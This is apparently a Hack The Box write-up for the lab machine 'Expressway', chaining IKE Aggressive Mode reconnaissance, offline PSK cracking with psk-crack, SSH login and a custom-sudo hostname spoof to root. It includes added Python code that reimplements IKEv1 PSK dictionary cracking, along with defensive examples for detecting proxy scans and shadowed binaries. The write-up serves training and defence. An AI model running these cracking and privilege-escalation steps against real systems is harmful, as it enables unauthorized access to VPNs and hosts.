
HTB: Expressway


Introduction

Expressway is a Linux machine that chains together several interesting techniques: IPSec/IKE VPN reconnaissance, offline Pre-Shared Key (PSK) cracking, SSH access via recovered credentials, and privilege escalation through a custom sudo binary that performs hostname-based policy checks.

nmap

nmap finds only one open TCP port, SSH (22):

sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.72.249
  • -sC run the default scripts
  • -sV enumerate service versions
  • -vv double verbose
  • -oA output in all formats
PORT   STATE SERVICE
22/tcp open  ssh

This left very little to work with from a TCP perspective, so a UDP scan was the logical next step.

sudo nmap -sU --top-ports 100 -Pn -T4 10.129.72.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 02:25 EDT
Nmap scan report for 10.129.72.249
Host is up (0.019s latency).
Not shown: 91 closed udp ports (port-unreach)
PORT     STATE         SERVICE        VERSION
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
445/udp  open|filtered microsoft-ds
500/udp  open          isakmp?
| fingerprint-strings: 
|   IKE_MAIN_MODE: 
|_    "3DUfw<
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
593/udp  open|filtered http-rpc-epmap
1023/udp open|filtered unknown
1719/udp open|filtered h323gatestat
4444/udp open|filtered krb524
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=9/23%Time=68D23DD8%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw<\xa3V\x17\xd0\xc2\xe7h\x01\x10\x02\0\0\
SF:0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x
SF:20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x01\
SF:x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0\x1
SF:4\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,9C,
SF:"1'\xfc\xb08\x10\x9e\x89\xf0\x91\xe9\tR\x92\x10p\x01\x10\x02\0\0\0\0\0\
SF:0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x20\
SF:x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\x80
SF:\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x14
SF:\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd5n
SF:\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x80
SF:\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.81 seconds

The UDP scan revealed several interesting ports.

Port 500 is the key finding here: it is used for IKEv1/IKEv2 VPN negotiation, part of the IPSec suite.

The Nmap fingerprint confirmed the service was responding to IKE Main Mode and IPSEC_START probes, indicating an active VPN endpoint.

IKE Enumeration

Identifying the IKE Configuration

With an IKE service on port 500, the next step was to use ike-scan to probe the endpoint and identify its supported parameters and identity.

I initiated an Aggressive Mode handshake, which is significant because Aggressive Mode transmits the identity and hash in plaintext, making it far less secure than Main Mode:

└─$ sudo ike-scan -A 10.129.72.249
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.72.249   Aggressive Mode Handshake returned HDR=(CKY-R=7cf96b680236cbb8) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.029 seconds (34.11 hosts/sec).  1 returned handshake; 0 returned notify
  • The peer identity (ID) is ike@expressway.htb - this is the username/FQDN used for IKE authentication.
  • Authentication is via Pre-Shared Key (PSK)
  • The encryption suite uses 3DES + SHA1
  • XAUTH is supported. This is an additional username/password layer on top of IPSec sometimes used to authenticate individual users.

I added the hostname expressway.htb to /etc/hosts.

Capturing the PSK Hash

Because I used Aggressive Mode, ike-scan captured the authentication hash from the handshake, which I can then crack offline.

The -Pike.psk flag told ike-scan to save the PSK material to a file:

└─$ sudo ike-scan -A 10.129.72.249 --id=ike@expressway.htb -Pike.psk

The resulting ike.psk file contains the captured hash data in a format that psk-crack can parse.

└─$ cat ike.psk  
e7071ac54d358dc555eae2cb797a798fb1f706279e36bfd704167b8341b906d02695afde6d60b0916ef5bba2520618e340056be48d4913566f46b3c5ac05827139de8f7432378bb1a246bb241006fc9dfbdd1a4b97959dadb474b1f8cf8e5460d6ab575c21ca784cb73131c8643588190c0dea2c66c722dd7b7a8005f301901a:a7dc6ee94fe68c7c769634ecc6ec79786f90dfde53c2c61cae761ec59026838bb70f70b44e1a4420ddfa4fe5202d841a5dae9b414d796cca25a7599c37e0d7f27c0072816c8734c89ef788a9f9a0baf84bafbd3816dd52b6dff02c6de5def5eb83901d48a057470488f28c34aff5ef8768614b4e6890a51f2872a95cccb1605e:5f4a4702967821c4:832b4c72e7883b8a:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:195edad776bb6d3b50b48e61bb76341efa55889c:99d2ceead1b74dab1bc0bc43a88ac961b76ddb08222ea9946ba4ce66d3d8441b:48ff4ac323dc2c0334cc2cc094abd18e81636342

PSK Cracking

With the PSK hash captured, I used psk-crack with the classic rockyou.txt wordlist:

└─$ psk-crack -d ~/Tools/rockyou.txt ike.psk 
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 48ff4ac323dc2c0334cc2cc094abd18e81636342
Ending psk-crack: 8045039 iterations in 9.076 seconds (886395.50 iterations/sec)

Recovered PSK: freakingrockstarontheroad
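To show why the captured material is crackable offline, here is an added example (not code from the original post, and not ike-scan or psk-crack itself) that reimplements the check psk-crack performs. It parses a line in the ike.psk format written by ike-scan -P (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, all hex), derives HASH_R for IKEv1 Aggressive Mode with PSK authentication as RFC 2409 specifies (prf = HMAC-SHA1 because the SA negotiated Hash=SHA1), and tests candidate keys against it. The handshake bytes in make_sample_line are constructed for the demonstration; they are not the values from the target.

```python
import hmac
import hashlib
from typing import Dict, Iterable, Optional

# Field order of one ike.psk line as written by `ike-scan -P` and read by
# psk-crack (colon separated, all hex):
#   g_xr : g_xi : cky_r : cky_i : sai_b : idir_b : ni_b : nr_b : hash_r
PSK_FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_psk_line(line: str) -> Dict[str, bytes]:
    """Split a psk-crack line into its nine raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(PSK_FIELDS):
        raise ValueError(f"expected {len(PSK_FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(PSK_FIELDS, parts)}


def hash_r(psk: bytes, f: Dict[str, bytes]) -> bytes:
    """HASH_R for IKEv1 Aggressive Mode with PSK authentication (RFC 2409):
        SKEYID = prf(psk, Ni_b | Nr_b)
        HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Everything here except `psk` travelled in the clear during the
    handshake, which is what makes the PSK testable offline."""
    skeyid = hmac.new(psk, f["ni_b"] + f["nr_b"], hashlib.sha1).digest()
    msg = f["g_xr"] + f["g_xi"] + f["cky_r"] + f["cky_i"] + f["sai_b"] + f["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def find_psk(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary check in the style of psk-crack: return the first candidate
    whose HASH_R equals the captured hash_r, or None if none matches."""
    f = parse_psk_line(line)
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand.encode(), f), f["hash_r"]):
            return cand
    return None


def make_sample_line(psk: str) -> str:
    """Constructed handshake material (not taken from the target) whose
    hash_r is derived from `psk`, so the check can be exercised offline."""
    f = {
        "g_xr": bytes(range(128)),                  # 1024-bit DH public values (modp1024)
        "g_xi": bytes(range(128, 256)),
        "cky_r": b"\x01" * 8,                       # ISAKMP responder / initiator cookies
        "cky_i": b"\x02" * 8,
        "sai_b": b"\x00\x00\x00\x01" * 10,          # stand-in for the SA payload body
        "idir_b": b"\x03\x00\x00\x00" + b"ike@expressway.htb",  # ID_USER_FQDN (type 3) + data
        "ni_b": bytes(range(20)),                   # initiator nonce
        "nr_b": bytes(range(32)),                   # responder nonce
    }
    f["hash_r"] = hash_r(psk.encode(), f)
    return ":".join(f[name].hex() for name in PSK_FIELDS)


if __name__ == "__main__":
    sample = make_sample_line("correct-horse-battery")
    print(find_psk(sample, ["password", "123456", "correct-horse-battery"]))
```

Each candidate costs two HMAC-SHA1 operations and nothing else, which is why psk-crack above gets through the whole of rockyou.txt in a few seconds; the only defences on the responder side are a PSK with real entropy, Main Mode (which keeps the identities and hashes under the Diffie-Hellman-derived key), or certificate authentication.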

SSH as Ike

With this I was able to SSH in as ike:

└─$ ssh ike@10.129.72.249
	freakingrockstarontheroad
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

And grab the user flag.

Notably, ike is a member of the proxy group, so the Squid proxy logs were readable, and they revealed an internal hostname: http://offramp.expressway.htb

ike@expressway:~$ cat /var/log/squid/access.log.1
1753229566.990      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.379      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.417     15 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3944 GET /nmaplowercheck1753229281 - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 POST / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3926 GET /flumemaster.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3916 GET /master.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3914 GET /.git/HEAD - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3926 GET /tasktracker.jsp - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3914 GET /rs-status - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://www.google.com/ - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3902 POST /sdk - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 XDGY / - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3916 GET /evox/about - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3906 GET /HNAP1 - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 TCP_DENIED/403 381 HEAD http://www.google.com/ - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3934 GET /browseDirectory.jsp - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3924 GET /jobtracker.jsp - HIER_NONE/- text/html
1753229689.058      0 192.168.68.50 NONE_NONE/400 3916 GET /status.jsp - HIER_NONE/- text/html
1753229689.114      0 192.168.68.50 NONE_NONE/400 3916 GET /robots.txt - HIER_NONE/- text/html
1753229689.114      0 192.168.68.50 NONE_NONE/400 3922 GET /dfshealth.jsp - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229689.165      0 192.168.68.50 NONE_NONE/400 3918 GET /favicon.ico - HIER_NONE/- text/html
1753229689.222      0 192.168.68.50 TCP_DENIED/403 3768 CONNECT www.google.com:80 - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 381 HEAD / - HIER_NONE/- text/html
1753229689.322      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229689.475      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.526      0 192.168.68.50 NONE_NONE/400 3896 POST / - HIER_NONE/- text/html
1753229689.629      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.680      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.783      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229689.933      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229690.086      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229719.140      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229719.245      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229760.700      0 192.168.68.50 NONE_NONE/400 3918 GET /randomfile1 - HIER_NONE/- text/html
1753229760.722      0 192.168.68.50 NONE_NONE/400 3908 GET /frand2 - HIER_NONE/- text/html
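The log above is worth reading from the defender's side too: it is an nmap-style sweep pushed through the proxy, and the same fields that leaked the internal hostname to ike are what a detection would key on. The following is an added example, not part of the original post, that parses Squid's native access.log format, collects per-client failure counts, unusual methods, destination hosts and known scanner paths, and flags noisy clients. The sample lines are copied from the log excerpt above plus one constructed benign line from a second client (192.168.68.20 and intranet.example.test are made up for the test).

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlsplit

# Common HTTP methods; anything else (PROPFIND, XDGY, ...) is worth a look.
COMMON_METHODS = {"GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "CONNECT", "PATCH", "TRACE"}
# Paths that appear in the excerpt above and are typical of service probes.
SCANNER_MARKERS = ("nmaplowercheck", "/.git/HEAD", "/HNAP1", "/sdk", "/evox/about")

# Eight lines from the page's log excerpt plus one constructed benign request.
SAMPLE_LOG = """\
1753229580.417     15 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3944 GET /nmaplowercheck1753229281 - HIER_NONE/- text/html
1753229688.847      0 192.168.68.50 NONE_NONE/400 3896 PROPFIND / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 XDGY / - HIER_NONE/- text/html
1753229689.222      0 192.168.68.50 TCP_DENIED/403 3768 CONNECT www.google.com:80 - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229689.058      0 192.168.68.50 TCP_DENIED/403 381 HEAD http://www.google.com/ - HIER_NONE/- text/html
1753229700.000     42 192.168.68.20 TCP_MISS/200 5120 GET http://intranet.example.test/index.html - HIER_DIRECT/10.0.0.5 text/html
"""


def parse_line(line: str) -> Optional[dict]:
    """Squid native access.log: time elapsed client code/status bytes method
    url user hierarchy/peer type. Returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 10:
        return None
    code, _, status = parts[3].partition("/")
    return {"client": parts[2], "code": code, "status": int(status),
            "method": parts[5], "url": parts[6]}


def dest_host(method: str, url: str) -> Optional[str]:
    """Destination hostname, if the request names one."""
    if method == "CONNECT":               # CONNECT host:port
        return url.rsplit(":", 1)[0] or None
    if "://" not in url:                  # bare paths and error: pseudo-URLs
        return None
    return urlsplit(url).hostname


def summarize(lines: Iterable[str]) -> Dict[str, dict]:
    """Per-client counters over a stream of access.log lines."""
    per_client: Dict[str, dict] = defaultdict(lambda: {
        "requests": 0, "failed": 0, "unusual_methods": set(), "hosts": set(), "scanner_hints": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_client[rec["client"]]
        s["requests"] += 1
        if rec["status"] == 0 or rec["status"] >= 400:   # 000 = aborted before headers
            s["failed"] += 1
        if rec["method"] != "-" and rec["method"] not in COMMON_METHODS:
            s["unusual_methods"].add(rec["method"])
        host = dest_host(rec["method"], rec["url"])
        if host:
            s["hosts"].add(host)
        if any(marker in rec["url"] for marker in SCANNER_MARKERS):
            s["scanner_hints"].add(rec["url"])
    return dict(per_client)


def suspicious_clients(summary: Dict[str, dict], min_requests: int = 5, fail_ratio: float = 0.8) -> List[str]:
    """Flag clients that mostly fail, use unusual methods, or hit scanner paths."""
    out = []
    for client, s in summary.items():
        mostly_failing = s["requests"] >= min_requests and s["failed"] / s["requests"] >= fail_ratio
        if mostly_failing or s["unusual_methods"] or s["scanner_hints"]:
            out.append(client)
    return sorted(out)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG.splitlines())
    for client in suspicious_clients(summary):
        print(client, summary[client])
```

The hosts set is the piece that mattered on this box: the denied request for http://offramp.expressway.htb sits in a log that any member of the proxy group can read, so the same one-liner that builds a detection also shows what a low-privileged local user can learn from /var/log/squid.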

Root

Starting privilege escalation with standard sudo -l:

ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password: 
Sorry, user ike may not run sudo on expressway.

There is nothing I can use, but it returned an interesting non-standard message:

Sorry, user ike may not run sudo on expressway.

I checked the location of the sudo binary:

ike@expressway:~$ which sudo
/usr/local/bin/sudo

This is not the standard sudo path (/usr/bin/sudo).

It means a custom binary was placed earlier in the PATH, overriding the real sudo, and this binary performs its own access control logic.

Internal Hostname

From the Squid proxy access log at /var/log/squid/access.log.1 I have an internal hostname:

TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html

Exploiting the Custom sudo

The sudo binary has a -h flag intended to specify a remote host to run a command on.

The hypothesis was that the custom sudo binary’s access policy was based on the hostname and that it might grant elevated privileges when the host is offramp.expressway.htb.

Since the -h value is user-supplied, it was trivially spoofable:

ike@expressway:/usr/bin$ /usr/local/bin/sudo -h offramp.expressway.htb ./bash

This bypassed the policy check entirely, spawning a root shell:

root@expressway:/usr/bin# id
uid=0(root) gid=0(root) groups=0(root)
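Two things went wrong here: a policy decision was made on a value the caller controls, and a look-alike binary was allowed to sit in front of the real one on PATH. The added example below (my own code, not the box's custom sudo, whose source is not on the page) models both. POLICY is a hypothetical table that reproduces what the binary appears to enforce (ike may run commands as root only on offramp.expressway.htb); authorize_vulnerable takes the host from -h the way the box did, authorize_hardened binds the decision to the hostname the OS reports, and find_shadowed is the check an administrator would run to spot /usr/local/bin/sudo masking /usr/bin/sudo.

```python
import os
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Hypothetical policy table modelled on what the custom sudo appears to
# enforce on this box; not the real binary's configuration.
POLICY: Dict[str, Set[str]] = {"ike": {"offramp.expressway.htb"}}


@dataclass
class Request:
    user: str
    command: str
    claimed_host: Optional[str] = None   # value given with -h, if any


def authorize_vulnerable(req: Request, local_hostname: str) -> Tuple[bool, str]:
    """Flawed check: the caller-supplied -h value replaces the real hostname
    in the policy lookup, so any user can pick a host the policy allows."""
    host = req.claimed_host or local_hostname
    if host in POLICY.get(req.user, set()):
        return True, f"running {req.command} as root on {host}"
    return False, f"Sorry, user {req.user} may not run sudo on {host}."


def authorize_hardened(req: Request, local_hostname: str) -> Tuple[bool, str]:
    """Fixed check: the decision is bound to the hostname the OS reports
    (socket.gethostname() on a real system); -h may say where a command is
    dispatched, but never which policy entry applies locally."""
    if local_hostname in POLICY.get(req.user, set()):
        return True, f"running {req.command} as root on {local_hostname}"
    return False, f"Sorry, user {req.user} may not run sudo on {local_hostname}."


def find_shadowed(path_dirs: List[str], listing: Dict[str, Set[str]]) -> List[Tuple[str, str, List[str]]]:
    """Report executables present in more than one PATH directory as
    (name, directory that wins, directories it shadows). `listing` maps a
    directory to the executable names in it, so it can come from the real
    filesystem (see path_listing) or be handed in for a test."""
    winner: Dict[str, str] = {}
    shadowed: Dict[str, List[str]] = {}
    for d in path_dirs:
        for name in sorted(listing.get(d, set())):
            if name in winner:
                shadowed.setdefault(name, []).append(d)
            else:
                winner[name] = d
    return [(name, winner[name], dirs) for name, dirs in sorted(shadowed.items())]


def path_listing(path_dirs: List[str]) -> Dict[str, Set[str]]:
    """Executable names per PATH directory on the running system."""
    out: Dict[str, Set[str]] = {}
    for d in path_dirs:
        try:
            out[d] = {n for n in os.listdir(d) if os.access(os.path.join(d, n), os.X_OK)}
        except OSError:
            out[d] = set()
    return out


if __name__ == "__main__":
    req = Request("ike", "/usr/bin/bash", claimed_host="offramp.expressway.htb")
    print("vulnerable:", authorize_vulnerable(req, "expressway"))
    print("hardened:  ", authorize_hardened(req, "expressway"))
    dirs = os.environ.get("PATH", "").split(os.pathsep)
    for name, wins, masked in find_shadowed(dirs, path_listing(dirs)):
        print(f"{name}: {wins} shadows {', '.join(masked)}")
```

On the box, find_shadowed run against the real PATH would have listed sudo with /usr/local/bin winning over /usr/bin, which is exactly the discrepancy `which sudo` exposed above; a package-integrity check (dpkg --verify, rpm -V) on the legitimate sudo would not have caught it, because the real binary was never modified.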

Now just grab the flag and it's done!

root@expressway:~# cat /root/root.txt

Summary

UDP Scan → IKE on port 500 (Aggressive Mode)
    ↓
ike-scan → Identity: ike@expressway.htb, Auth: PSK
    ↓
psk-crack + rockyou.txt → "freakingrockstarontheroad"
    ↓
SSH as ike → proxy group → readable Squid logs
    ↓
Squid logs reveal → offramp.expressway.htb
    ↓
Custom /usr/local/bin/sudo → -h flag spoofing
    ↓
root shell